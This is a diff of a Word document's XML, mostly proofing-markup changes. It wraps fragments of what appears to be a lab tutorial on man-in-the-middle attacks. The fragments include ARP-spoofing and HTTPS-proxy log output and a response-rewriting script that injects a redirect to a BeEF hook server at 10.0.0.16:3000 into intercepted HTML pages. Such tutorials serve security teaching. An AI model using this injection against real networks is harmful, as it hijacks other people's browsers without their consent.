+        <w:t>»</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>00</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>06</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>53</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>inf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>https</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> started on </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>10.0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>0.16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>»</w:t>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>8083</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12094,250 +13659,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="006666"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="006666"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>06</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="006666"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>53</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>sys</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>inf</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> https</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">proxy started on </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="006666"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>10.0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="006666"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>0.16</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="006666"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>8083</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>sslstrip disabled</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sslstrip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> disabled</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12456,6 +13798,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12501,6 +13844,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12674,7 +14018,25 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Part 4: Leveraging JavaScript Injection to a BeEF Hook</w:t>
+        <w:t xml:space="preserve">Part 4: Leveraging JavaScript Injection to a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Hook</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
     </w:p>
@@ -12772,16 +14134,38 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> onLoad</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>()</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>onLoad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12845,6 +14229,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>log</w:t>
       </w:r>
       <w:r>
@@ -12872,7 +14265,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"Injector loaded."</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Injector loaded."</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12936,6 +14339,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>log</w:t>
       </w:r>
       <w:r>
@@ -12947,6 +14359,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12999,7 +14412,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>'arp.spoof.targets'</w:t>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp.spoof.targets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13152,8 +14585,20 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> onResponse</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>onResponse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13163,6 +14608,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13262,6 +14708,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13287,8 +14734,19 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> res</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>res</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13325,6 +14783,7 @@
         </w:rPr>
         <w:t>indexOf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13494,7 +14953,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> res</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>res</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13514,6 +14984,8 @@
         </w:rPr>
         <w:t>ReadBody</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13577,6 +15049,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13602,8 +15075,19 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> body</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>body</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13622,6 +15106,7 @@
         </w:rPr>
         <w:t>indexOf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13783,6 +15268,16 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>res</w:t>
       </w:r>
       <w:r>
@@ -13803,6 +15298,8 @@
         </w:rPr>
         <w:t>Body</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13828,7 +15325,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> body</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>body</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13848,6 +15355,7 @@
         </w:rPr>
         <w:t>replace</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -13990,7 +15498,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>'&lt;script&gt;document.location="http://10.0.0.16:3000/demos/basic.html";&lt;/script&gt;&lt;/head&gt;'</w:t>
+        <w:t>'&lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
